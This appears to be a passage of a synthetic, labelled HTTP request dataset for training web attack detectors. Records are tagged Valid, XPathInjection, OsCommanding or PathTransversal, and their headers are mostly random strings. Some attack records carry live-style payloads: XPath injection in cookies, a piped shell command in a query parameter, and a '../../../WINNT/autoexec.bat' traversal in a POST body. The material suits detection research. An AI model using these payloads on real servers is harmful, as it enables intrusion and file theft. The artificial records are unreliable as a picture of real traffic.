UA-Disp: 436,9131,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9135x2545
Via: FTP/4.3 www.3faN.css, FTP/3.9 www.toyC.tiff
Transfer-Encoding: deflate
Upgrade: idie/5.0, 2adte/6.6, cbhkaG/8.0
Warning: 274 108.86.172.150 "eennseA" 
X-Forwarded-For: 208.220.17.9
X-Serial-Number: 534036492924791
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17387
Start - Id: 418
class: Valid
GET /bJ/fJbN/n051oltueif2n/ydAP_AFxFsytk82/xysdnqH/euiahatyeiNoe/elPpVUX9Qa891m_a/rjnaEmthndGie/etRAz8m6ww.f.exe?KLkWYy=eTo&ooenajS0=d5u069r&mth6=cazboot.initg+w-%29n%27st&ywicjR=erEgric HTTP/1.0
Host: 83.43.211.55
Connection: close
Accept: */*;q=0.3
Accept-Charset: x-mac-chinesesimp;q=0.6
Accept-Encoding: gzip, deflate;q=0.0, identity, deflate;q=0.2
Accept-Language: *;q=0.9
Cache-Control: only-if-cached
Client-ip: 54.33.113.204
Cookie: 13iYv6ELR=h
Cookie2: $Version="17"
Date: Sun, 30 May 04 12:17:05 CET
ETag: "S0COAidTeioOfvMcFn0"
Expect: 100-continue
From: enIsusc@saoftwhhea.net
If-Modified-Since: Sat, 03 Jul 04 06:27:18 GMT
If-Unmodified-Since: Wed, 13 Jan 10 07:06:33 CET
If-Match: "wgXFZ02@LKHzvr04aWf"
If-None-Match: "JELitddlCrvVfZPFu"
If-Range: Sat, 20 Aug 05 08:56:22 UTC
Max-Forwards: 8
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: 6nlOpg rtnm=stbdwR
Authorization: reSmaG iooeb2=sinifhAE
Range: 63476-77033,-529,5-
Referer: /orqsbrt/sehn/nicS.js
TE: trailers,gzip
Trailer: Trailer
User-Agent: BB1hasqsn/9.5.3.9.8
UA-CPU: Sparc
UA-Disp: 810,8513,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 7545x2141
Via: HTTP/1.3 30.79.73.213:8, 8.1 174.152.70.123
Transfer-Encoding: gzip
Upgrade: t3uow/0.2, 6nnat/6.0, iR9/7.3, tts/0.0
Warning: 942 91.154.237.154 "h59jnrdncehalTSdatn" "Tue, 19 Oct 04 16:05:21 GMT"
X-Forwarded-For: 117.218.252.232
X-Serial-Number: 5470041402
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 418
Start - Id: 16174
class: Valid
GET /mt5nielroT.mspx?ytn2rnebas=uii%3Cpm+h9mee&ohqhiS=3288060713&mDqTH=n%26se%29e&tA8=4955&yp3i=hw1kmtFNz&kaNleocui=I+autoexec%5C&MYmail0pfdig=7re+oe72&n17wrstQmNn=1lalhs%28n&eeo7av=sbetweeng HTTP/1.0
Host: www.hvsA6rtia.de
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: compress;q=0.1, deflate;q=0.8, gzip
Accept-Language: *
Cache-Control: max-age=9
Client-ip: 79.127.230.228
Cookie: rcp_lusrhtacceswwp-=tcS;ooct6alrA=ehhr4mbcbai8oeb5dn;yH3fD8=19960439;oha4mshaehet=06
Cookie2: $Version="8"
Date: Mon, 27 Feb 06 03:37:35 CET
ETag: "GdpkdGTcDO4ooYNc83N"
Expect: 100-continue
From: mEck5@aosi.it
If-Modified-Since: Sat, 08 Dec 07 02:52:01 GMT
If-Unmodified-Since: Fri, 13 Jan 06 15:03:19 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 17 Dec 07 02:59:06 GMT
Max-Forwards: 305
MIME-Version: 3.7
Pragma: hrth=0qf02D
Proxy-Authorization: Basic YWlybDJjOXg6bG93YQ==
Authorization: Digest realm
Range: 2181-,58-,9-1
Referer: /aatviE.txt
TE: chunked,deflate
Trailer: Accept-Encoding
User-Agent: l5seooOc (ldVM.EB)
UA-CPU: PowerPC
UA-Disp: 1227,627,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 846x8936
Via: 9.9 128.46.49.182
Transfer-Encoding: gzip
Upgrade: fatonx/1.7, 3c2/0.8, 5net/4.7
Warning: 454 www.8icditia.html "fbenTdedlumlppa" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 93986505780134
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16174
Start - Id: 29214
class: Valid
GET /3ApasswdOFtbO5b/cThYrw@zIGU2@.jpeg?ojwpveiiTe=nTeRi&e3=cT6tV&mzh=ewndw9V&52tccnefi=dYo3X&kd2=82&oasishwqiuz6=ina&nt0xdc=%7E%3E0eicieamwd&ese3=qb-Zp%2Ftjtt+d&3Mr5eleonghthe=tsst%28tllm&varselectYHC=dteteroou&vXzJdchildV=0 HTTP/1.0
Host: 140.98.52.219:80
Connection: close
Accept: image/*;q=0.7, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: muu7npz-UeoOlner;q=0.8
Cache-Control: max-stale=47
Client-ip: 170.251.130.23
Cookie: Fk5ftdropkL=785715843;ns=ncntssstsyLte;xn=mrT;yinohn=f39mg7ybb5C
Cookie2: $Version="3"
Date: Mon, 10 Mar 08 01:33:22 CET
ETag: W/"etZAFCdpVXdAB-7r1"
Expect: 100-continue
From: aOsere@astiy.biz
If-Modified-Since: Tue, 09 Sep 08 05:58:33 GMT
If-Unmodified-Since: Wed, 01 Mar 06 20:42:41 CET
If-Match: *
If-None-Match: "piF2JHmoI4XRRgADSa"
If-Range: Thu, 01 Dec 05 18:21:31 GMT
Max-Forwards: 635
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Digest qop=deeie
Authorization: NTLM Z2Zub2FhNXJ0bkFrc21uYXJvb2x0dDBhMzVvem5lZ3RzbGVkaWxPMXdlbTh3Ymk=
Range: -4
Referer: http://ltnkchg.com/1nuE/st8h.swf
TE: gzip
Trailer: User-Agent
User-Agent: Mozilla/2.2 (Windows; U; Win98 5.8; ai-ie; rv:0.3.9) Gecko/49258813
UA-CPU: PowerPC
UA-Disp: 323,9503,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 887x0016
Via: 1.2 www.rttT.shtml:03713, FTP/6.2 33.36.55.189
Transfer-Encoding: gzip
Upgrade: itc/2.5
Warning: 332 146.198.222.127 "sgnyiw" 
X-Forwarded-For: 232.31.166.192
X-Serial-Number: 417531274115
----: ------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 29214
Start - Id: 48450
class: XPathInjection
GET /ja4wfh/sUyb5BKfWkUAQNT1SJpu/aNa-gTB/.node4gYVl6ul4/eLVHcw/akxNaoebozn9lrO8Thc.php4?no5e6inq5koeadC=+9&oeilulyl=834129242 HTTP/1.0
Host: www.Irfn.ch
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.6
Accept-Encoding: 
Accept-Language: turoe-u, r3thfehT-reb2n;q=0.4, ll5r-as0Ori, tGzt-h;q=0.1, jwzv-GmgrT
Cache-Control: max-age=56
Client-ip: 59.195.168.32
Cookie: Srnumwwhr=ogrRtoae'    or  1<     Aebaaz/s/6eo/child::text()[position()=28]    or     'wnhtoo'    = ';rfeneo=eenvnhttfvhEtiwo;Qb-qnk=0ustyle;Snull0CTpasswdWE7t=cIidGwonu;litswffxtdTa=08
Cookie2: $Version="425"
Date: Fri, 31 Aug 07 05:08:07 GMT
ETag: "QP_.5jPP7.Rv5UaT"
Expect: 100-continue
From: Lulrt@wdvuoa.de
If-Modified-Since: Thu, 15 Jul 04 17:55:06 GMT
If-Unmodified-Since: Fri, 17 Feb 06 05:22:42 GMT
If-Match: *
If-None-Match: "xB6m24pKSOZF@W8l"
If-Range: Sat, 28 Mar 09 18:55:19 CET
Max-Forwards: 057
MIME-Version: 0.0
Pragma: afhi9i=eng1dam5
Proxy-Authorization: Tcdn 7efalmwm=stoxcSra
Authorization: NTLM ZU9sc2RlcmkyMXZudGl3bGViZmljYXljc250aXdhbm43eG90b3RvOEFlZWVvaXFl
Range: 2-,035919-,808526-
Referer: http://www.ohHbrr.fr/xG4an/wde1r/eiiae.wav
TE: deflate;q=0.0,trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/0.0 (X11; U; Open BSD i386 1.6; b4-ec; rv:5.5.4) Gecko/33945099
UA-Disp: 5360,872,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 348x583
Via: HTTP/8.7 www.rpoaeN2o.shtml, 4.2 www.ario7l.html, 5.6 125.148.207.240
Transfer-Encoding: compress
Upgrade: rtyfAi/5.9
Warning: 787 www.nspetr.htm "homtzfS" 
X-Forwarded-For: 152.33.64.46
X-Serial-Number: 30614
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48450
Start - Id: 48405
class: XPathInjection
GET /rxft5a4ss/sKOvJ0xL20/hselectBeA/WY6YxN5cioDhxa/Ex8ndneare/i-8dg7@iL/kh_qhXMqRQz9A2y@/0-yqS/eh.dll?ave155a3nonab=ta&O3cea0leetccBe=4%28ebh1yykSd&ColjlbpshUId=sdrmoptunfieG+&AvFG.JFJ2KO2=0I7faetnh&lpa=248735436&ri=dgaudraatIyotns&slr=tcaJ2m.WaN&fsMcies=wiaoiAlctcaafh&72latih6talgd=389&xhlo=puk9dnahneih&a4rnweeN=21&pcfpidnRisgi=083 HTTP/1.0
Host: 0.245.176.153:75
Connection: keep-alive
Accept: application/*;q=0.8, image/png
Accept-Charset: iso-8859-7, koi8;q=0.0, iso-8859-9
Accept-Encoding: 
Accept-Language: dIfA-umne8REn;q=0.4, s1b9fps-e30elnre, neelAfmC-oorpg;q=0.5
Cache-Control: no-cache
Client-ip: 189.0.55.166
Cookie: 5onsu=dedoc']   |   P     |  //user[    name/text( )  =  'aaei;tyet5bpsc0eitim=1136841;lAdmaaon=ft
Cookie2: $Version="281"
Date: Sun, 04 Feb 07 24:26:48 CET
ETag: "uBQmAjebma-B2P_8"
Expect: Srhdi=htbohc
From: leYi@sarsGQ.cz
If-Modified-Since: Sat, 01 Mar 08 17:24:10 CET
If-Unmodified-Since: Wed, 07 Oct 09 07:48:33 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Feb 10 09:35:25 UTC
Max-Forwards: 6
MIME-Version: 3.2
Pragma: no-cache
Proxy-Authorization: Digest qop=auth
Authorization: Digest cnonce="rl5Gq"
Range: 855865-05
Referer: http://nsuF0ene.cz/t5prsim/rliiX4f/iotte7h/hospnki/x8oju.dll
TE: trailers
Trailer: TE
User-Agent: lues (hnz58Q; hcE_GX)
UA-CPU: x86
UA-Pixels: 5368x1162
Via: FTP/5.1 www.Tchtt.shtml, 0I4/4.9 www.elauqb.tiff:8, 9.3 www.ohnCl.gif
Transfer-Encoding: deflate
Warning: 972 www.uipireyt.htm:1 "IieNhaim" 
X-Forwarded-For: 152.108.49.185
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48405
Start - Id: 2089
class: Valid
GET /8EG5uS/pobmctb5T0v/tjrtwlht/aoon/woJio1jr5@C9@J/LtyMbe/eZeDbSK2insN/p3aoGh4W/hlO92KGGKToSR622n/fOe6T0/4uYH89czRi16r.cfm? HTTP/1.0
Host: www.5fytjteD.st
Connection: reyEvqRe
Accept: image/gif;q=0.9
Accept-Charset: koi8-r;q=0.1
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.2
Cache-Control: max-stale=2
Client-ip: 189.41.152.51
Cookie: UmeRnwl=67297;WbHFgpositionZ6e4=e25mc1BCHgI;lTLaeEyol=66983263
Cookie2: $Version="329"
Date: Mon, 29 Jan 07 08:26:02 UTC
ETag: W/"GbiGXpWdtDauJ0OzWwS"
Expect: 0raee
From: Iosu@aert5hd.ch
If-Modified-Since: Sat, 21 Jan 06 17:08:16 GMT
If-Unmodified-Since: Fri, 25 Sep 09 15:09:50 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 06 May 07 03:14:24 CET
Max-Forwards: 0883
MIME-Version: 0.9
Pragma: UcNsttEs=oesn
Proxy-Authorization: Basic bDU0RTVvcjphZWEwdA==
Authorization: ncDl atib=kgsamh
Range: -0,-85855,759632-
Referer: http://yoeErV7.com/3ulepx/esrr/oIivtiih.tiff
TE: gzip
Trailer: TE
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 0.3; p7-bo; rv:3.1.2) Gecko/79217491
UA-CPU: StrongARM
UA-Disp: 4115,383,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9666x5160
Via: 4.2 www.eqKtm.png, HTTP/3.7 68.177.153.198:26319, 3.3 www.ceey.shtml
Transfer-Encoding: identity
Upgrade: yq8/2.8, eehttw/5.0, dkosox/1.5, escije/5.1, snhtg/0.5
Warning: 818 177.52.40.0:7 "eese0qtmam" "Thu, 12 Nov 09 18:55:16 GMT"
X-Forwarded-For: 132.82.181.214
X-Serial-Number: 0933416903549
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2089
Start - Id: 27030
class: Valid
GET /eval15RFtelnetBA9/mRsCsIorS.4PV50l5/Ae7plehCeoTe9scwsU/lbniHu3weayt/stgouzsnsonr/onuosjieiDcde/tea2hitsem1seon/hlghe/maJ0HmG3R56P/x_ATDzyV-2-DilLbizDR/eb5XuKLIHRoEGw/htEosuxbie1obqa.aspx?UJDlogIdivC=cPZ-GRaBH9&oCiBllTeTatm=tFUT7&iif9etxeH=6452&bcO=+S&canS0eEtl=sstdp&ws=26&Kad1iieeanreh=%29&0dt1Y8bgbowxm=949045&ms=+rj&7nnm2epY9olu=0476964104&psun=tnode&QY4between=79992624&na8yieRcOatll=oncEs%25teuzirm&w3nneessh7dImlI=%2Fobnv&sbtemdnmOdhn=br HTTP/1.0
Host: www.lpRg.net
Connection: close
Accept: application/*;q=0.5, video/quicktime;q=0.7
Accept-Charset: *
Accept-Encoding: 
Accept-Language: SeenO8-w5, vre-3a;q=0.5, 9-stedl
Cache-Control: no-cache
Client-ip: 111.60.181.37
Cookie: eEeso=sl;ilUe5idu=dGt
Cookie2: $Version="40"
Date: Sat, 30 Apr 05 17:11:02 CET
ETag: W/"a1f3Bl9qZLzjrTVjn6"
Expect: 100-continue
From: RPoOyeue@ifon.de
If-Modified-Since: Thu, 21 Aug 08 24:21:34 UTC
If-Unmodified-Since: Sun, 14 Mar 04 07:43:48 UTC
If-Match: *
If-None-Match: "2QnzzDUZtbkzbI3Ipyjs"
If-Range: Sat, 14 Feb 04 01:30:04 UTC
Max-Forwards: 279
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Basic b3RuaWFSYTpodG5vdGk=
Authorization: Basic bkp0aVRibmg6eXRhdHA=
Range: -2,41933-,520-237717
Referer: /etstuli/Qlervoa.asmx
TE: chunked;q=0.0
Trailer: If-Modified-Since
User-Agent: Mozilla/7.1 (Windows; U; WinNT 5.9; Ec-xs; rv:2.6.8) Gecko/59183167
UA-CPU: StrongARM
UA-Disp: 1221,0592,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 6860x985
Via: FTP/0.6 229.211.149.237
Transfer-Encoding: n9jtak
Upgrade: oleg/7.0, eesLi/0.3, s6tY/7.4, Ehnhw1/4.6
Warning: 403 www.8hMuea.png:3834 "nqsdba2zVU4" 
X-Forwarded-For: 41.72.7.124
X-Serial-Number: 95252684073786404
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 27030
Start - Id: 31248
class: Valid
GET /ena3rina/otAHHi/yih1peGeCertiMtnn3h/r4eeoe4mAbEfhsTh3r/dkJDB1/BFeIfE3L5.cfm?eoehstwbwOoi=ibnIacunifeAe&iE9=cp4Rz HTTP/1.0
Host: 98.211.61.78:80
Connection: close
Accept: video/*
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-cache
Client-ip: 32.138.140.81
Cookie: R%u7mLni=926447;eurbinmeot9d=lisniszfhnn9d;nmr1ocehabmTat=48sofajeooe
Cookie2: $Version="28"
Date: Thu, 21 May 09 03:02:33 GMT
ETag: "dX63Qs_s@JrSd_v_W"
Expect: 100-continue
From: ettihl@s2tpbthdps.com
If-Modified-Since: Fri, 22 Aug 08 07:33:36 GMT
If-Unmodified-Since: Sat, 27 Jan 07 11:12:35 CET
If-Match: "elW59T@SC4VeLOeTfS"
If-None-Match: *
If-Range: "6am13tziAX5yo.1N"
Max-Forwards: 5
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: Basic dGFvaHBzOmVzb0l1
Range: 019-,893-4434
Referer: http://www.rydV.fr/niNb/xthsMin/eS4as/mnddeiar.jpeg
TE: trailers,gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.1 (X11; U; Linux i386 0.4; ou-ef; rv:4.4.9) Gecko/09349610
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 3795x126
Via: 2.7 102.214.73.244:06708, FTP/4.6 www.aduChitd.html, FTP/2.2 www.o4reyhcp.html
Transfer-Encoding: deflate
Upgrade: saowt/0.0, sfnh/5.8, toer/0.8
Warning: 221 www.O4or.jpeg "kaaoteuyfsaeeehare1" "Wed, 30 Mar 05 17:25:44 GMT"
X-Forwarded-For: 154.121.5.105
X-Serial-Number: 65900782326
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31248
Start - Id: 43134
class: OsCommanding
GET /0cpu/gdeletemailcn4qnhPvB8lr/zpstdinxmlUV/UH3H1uN8SB1.cfm?Xx50Z3HNNCdupdate=cEb&pg1OFC2includexp_A4=%7C+echo++%22Content-Type%3A+text%2Fhtml%22+++++%3B++++echo++++%22%22+++++%3B++++id+++%5C0&Dxp_I8hh9d9GZaccess_log=cu HTTP/1.0
Host: www.irats8pe.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.8, compress;q=0.0
Accept-Language: *;q=0.2
Cache-Control: max-age=08
Client-ip: 143.187.208.131
Cookie: n1eecayara=21447
Cookie2: $Version="7"
Date: Sun, 29 Apr 07 16:12:30 UTC
ETag: W/"1Bt5VxNgPIaefYNngm27"
Expect: 100-continue
From: ndud@rzo8frE.cz
If-Modified-Since: Tue, 28 Jun 05 11:26:08 UTC
If-Unmodified-Since: Sat, 28 Nov 09 17:49:55 GMT
If-Match: *
If-None-Match: "8R-3vo1FDgZcf@kZ0x"
If-Range: Sat, 25 Oct 08 16:51:39 UTC
Max-Forwards: 288
MIME-Version: 2.9
Pragma: g='Uia'
Proxy-Authorization: qgem2 pmastofe=hwHts
Authorization: m2rvs yityfc=tit4
Range: 06-14835,74438-28398,3461-5
Referer: /onebbv6e/Dyispe/aixnetnq/swLze.dll
TE: chunked;q=0.8,chunked;q=0.5,trailers
Trailer: If-Match
User-Agent: Tjto (nFq9TpeT; aihpjQSh; ex9kG_V; h3AP8iv; o_cY1C)
UA-CPU: Sparc
UA-Disp: 5887,6465,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 556x187
Via: 7.1 www.tieon.shtml, 8.2 208.220.15.166
Transfer-Encoding: pjyc
Upgrade: arlate/4.9, dxn6g/2.1, pi4tlo/0.5, cgu/2.4
Warning: 268 9.126.100.201 "nymbntn" "Thu, 16 Aug 07 04:22:38 GMT"
X-Forwarded-For: 1.132.119.183
X-Serial-Number: 231798615796568
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43134
Start - Id: 9458
class: Valid
GET /c7V9j.exe?Mregdfaofs=Ncma0n+einclude5n%3F HTTP/1.1
Host: www.seocsro.be:3256
Connection: GeEtr3
Accept: audio/*;q=0.8, audio/*, text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 232.247.249.159
Cookie: eegoedhhchnpzft=0192;rmcXjbodyw=e1d
Cookie2: $Version="37"
Date: Sat, 28 Mar 09 12:38:50 GMT
ETag: "8VXrcaxe267wYjWNWF3G"
Expect: 100-continue
From: ieue@hoegnHqytl.be
If-Modified-Since: Tue, 16 Aug 05 14:02:23 GMT
If-Unmodified-Since: Sat, 25 Nov 06 08:37:07 UTC
If-Match: "AVRKwF57zJp0_xoX"
If-None-Match: *
If-Range: Mon, 10 May 04 01:12:02 GMT
Max-Forwards: 3
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: Basic eXdibHRhOmJhNmg1eXQ=
Authorization: Basic d3BhZWt1ZXk6ZWFhbmxqZ2U=
Range: 2390-,9-,2497-
Referer: http://www.9amgh.be/teaoTp/aeud/eNbpbne.mpg
TE: trailers
Trailer: Date
User-Agent: Mozilla/7.9 (X11; U; Unix 5.4; s6-u0; rv:3.7.1) Gecko/48697608
UA-CPU: MIPS
UA-Disp: 073,150,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 383x664
Via: 7.9 www.7hlH6f.jpg, 0.5 www.blea1trn.html
Transfer-Encoding: deflate
Upgrade: osunde/3.2, hb1wa/9.8, twa/3.2, aRypee/7.6, knlu8/6.7
Warning: 579 28.101.180.151:87 "tiicEdd" "Tue, 17 May 05 01:19:10 GMT"
X-Forwarded-For: 139.44.198.239
X-Serial-Number: 637220700897
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9458
Start - Id: 45361
class: PathTransversal
POST /lE/9it8nx/nfX_d/noohmliltg/eilwei/z66mkSEyZH2X_yR/Eef4libt9vvn.mspx? HTTP/1.1
Content-Length: 272
Content-Language: y9rcr
Content-Encoding: identity
Content-Location: http://onatal4a.be/hjDtnBr/hrsl12a/MgnRaude/auanu01/suenidat.mp3
Content-MD5: dDZ0TGFrYmxqQmJmc2VBdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Sep 04 03:46:53 CET
Last-Modified: Wed, 11 Feb 09 08:05:17 UTC
Host: www.iWedFbnPwi.com:8727
Connection: close
Accept: */*
Accept-Charset: iso-8859-9;q=0.8
Accept-Encoding: 
Accept-Language: ws-H;q=0.6, natv-rsb, rDshx3t4-ASe4;q=0.6, h-ipsO8i, g2dcb3l-ttetufT
Cache-Control: no-cache
Client-ip: 56.210.145.221
Cookie: Ltei0qou=hnits;d5wOnoxraoebh=ro
Cookie2: $Version="75"
Date: Wed, 08 Mar 06 02:31:19 UTC
ETag: W/"U2a0GiJc3J0cPtWSB_w4"
Expect: xtha
If-Modified-Since: Wed, 16 Dec 09 10:23:14 UTC
If-Unmodified-Since: Mon, 06 Sep 04 10:55:04 UTC
If-Match: "XLW0ur@4Xfo75Sl2"
If-None-Match: "W13Lr9PZLtNYx7nB81zj"
If-Range: Sat, 28 Nov 09 16:48:34 UTC
Max-Forwards: 105
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM OWl0bmdqbmhuZTZNbmllYnJUS1NlZTBvbW5yaXJvRWFpZ2VlaGUxZURzYWd4
Authorization: NTLM azNtdnR0aG51cGVoZWJzY3NyNnRsYWVvaW9haWJjZHVvd2V0cm84
Range: 53-,6570-433377,-5771
Referer: /yoahzn/tdljAfz/odia/betcN.tar
TE: gzip;q=0.6,chunked;q=0.0,trailers
Trailer: Trailer
User-Agent: Mozilla/3.7 (X11; U; Open BSD i386 7.8; cd-om; rv:7.5.2) Gecko/82960217
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Pixels: 822x200
Via: FTP/8.8 www.oFsc872a.shtml, rde0/8.2 www.ahougtr.png
Transfer-Encoding: gzip
Warning: 478 20.131.244.84 "nL6r2ouvmnheNdq" "Tue, 20 Feb 07 12:02:29 UTC"
X-Forwarded-For: 42.158.87.228
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

kin=aosr1E@o&lZ@T3iQ=nk7zon&ecgodudYwafrsh=shkwl4paplemgZ&Oiframeiframejzj8KJDfpassthru=9281612&rrremmm=7nmlebn3nJs&logfhomefromoWYzt=../../../WINNT/autoexec.bat&ncDgvvy=7thtenfE&otdecooeysee0=RaAx|lgeeahMg[8l&es1agnwarOtyy1=S<a&itot=h~l&eysihemHbet=ittn

End - Id: 45361
Start - Id: 25169
class: Valid
GET /ie6-apoMb_-maP8Yk/j0dx4@TanJ6/JjPxVy/amagkrteseso17o/tb5JwC6MppYmsaT.html? HTTP/1.1
Host: www.ezAfcsrse.net
Connection: close
Accept: */*
Accept-Charset: x-mac-japanese;q=0.8, windows-1258;q=0.6, x-mac-japanese, iso-8859-8
Accept-Encoding: gzip, compress, identity;q=0.1, deflate
Accept-Language: QbI-onsea, oe4h-o5oh;q=0.2, eitsna-b0ba;q=0.7, e-j
Cache-Control: no-cache
Client-ip: 3.143.186.155
Cookie: PocpassthruSWI@-e=emnidcedeaqweijoe;1npofure=443807677;hetsam6=Ieeval;eeienZ=7
Cookie2: $Version="8"
Date: Wed, 01 Oct 08 22:34:31 CET
ETag: W/"H5UmMh.r4DbgYRT@Gvo3"
Expect: nl8d
From: t6e6@olsywdnTj.it
If-Modified-Since: Sat, 22 Mar 08 19:55:40 GMT
If-Unmodified-Since: Mon, 23 Feb 04 17:24:07 UTC
If-Match: "IJfig.IfiCGBGo5S"
If-None-Match: *
If-Range: Mon, 10 Oct 05 11:30:28 UTC
Max-Forwards: 1
MIME-Version: 9.1
Pragma: odw='issfee'
Proxy-Authorization: NTLM eHVjMWU5b2lodGVzdG9Jd1R6Zm9kbW5paGgyck9hRTc=
Authorization: aetier 41ettep=qtihlcs
Range: 0550-
Referer: http://tstjfsa.be/1aoudc/hreece.html
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: 5eeutm/6.4.3
UA-CPU: Sparc
UA-Disp: 550,936,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5457x802
Via: valdrs/0.4 www.y9sddfr2.tiff:0, 5.5 www.tUSeyI.png:3, 6.9 163.95.1.208:1
Transfer-Encoding: identity
Upgrade: tIis/4.6
Warning: 814 www.tanns.gif "7et8naWmlnMpa" 
X-Forwarded-For: 54.93.72.103
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25169
Start - Id: 49099
class: XPathInjection
GET /TtouRa1yTlbtxboin/tEg6lsbK/exDSRA9/S@P-ARjM-Hu/gojF24JWT0mZN6YbMw/leiTtdhltkwc/ae4Ibfrteepbyraulhs/lavntLoenS/u4TzadrrrHr4b/gmao0uuC..gif?akectiho=324944&loihje4o=7Ndonep&ee=yYbrHi&whMsU=862815&oeu=2123315&eeFcew8o=2ecrn&eduohe1Eere4nL=9381316&uiAenen=hSvreeu&tjiodafvefd=04281&eynoFsvfi=syba8dbeen&sIe=518&a2ha=299&ActxZynmr=7+++++or+nrmod%2Fqeat%2Fle%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D78%5D+or+9%3D&hcme=bdpesfe9hahs HTTP/1.1
Host: www.dlbnS.ch:80
Connection: l5s5pyt
Accept: video/*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: sitf-uw;q=0.8, t-owlsioT, rSloiEbo-oeisRi
Cache-Control: no-store
Client-ip: 215.194.111.216
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="212"
Date: Wed, 25 Jun 08 11:54:56 GMT
ETag: W/"9c1zWwtNPtQbZAAbA6q"
Expect: aZnyhTei
From: oayjh@w9ulna6.biz
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sun, 05 Jun 05 14:00:58 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: "uyfznM1XcRBNtR-"
If-Range: Sun, 31 Oct 04 03:34:56 GMT
Max-Forwards: 2
MIME-Version: 4.7
Pragma: clui2pz=7Ew
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: gijla d8wEsd=t1Rj
Range: -21
Referer: /e3Ei/xfce/t6nua/aighHxle/Mbea.php4
TE: trailers,chunked;q=0.2,trailers
Trailer: Referer
User-Agent: Mozilla/4.5 (Machintosh; U; PPC 7.3; tu-aU; rv:7.6.7) Gecko/99062134
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: ekfeO/3.1 www.nfi2.shtml
Transfer-Encoding: identity
Upgrade: aau/4.8
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49099
Start - Id: 24926
class: Valid
GET /iwhouh.asp?NirL=eewne HTTP/1.1
Host: www.crbs.cz:80
Connection: close
Accept: audio/*, image/*
Accept-Charset: *;q=0.6
Accept-Encoding: identity, compress;q=0.2
Accept-Language: Ao-vhg;q=0.7, t-3t, u-oernlo
Cache-Control: no-transform
Client-ip: 210.63.57.145
Cookie: swwfgOij1atr=4982044;xp_etcp9v@x3Tcj9=a;jovp9ect=rrtyetA;tzsmin9aleior=is;h5decdfvraowlue=0;lIoruTW@8IDj=y]
Cookie2: $Version="0"
Date: Wed, 07 Sep 05 10:53:00 GMT
ETag: W/"94Jp1voaoqMA_sTF"
Expect: Oo1wtt
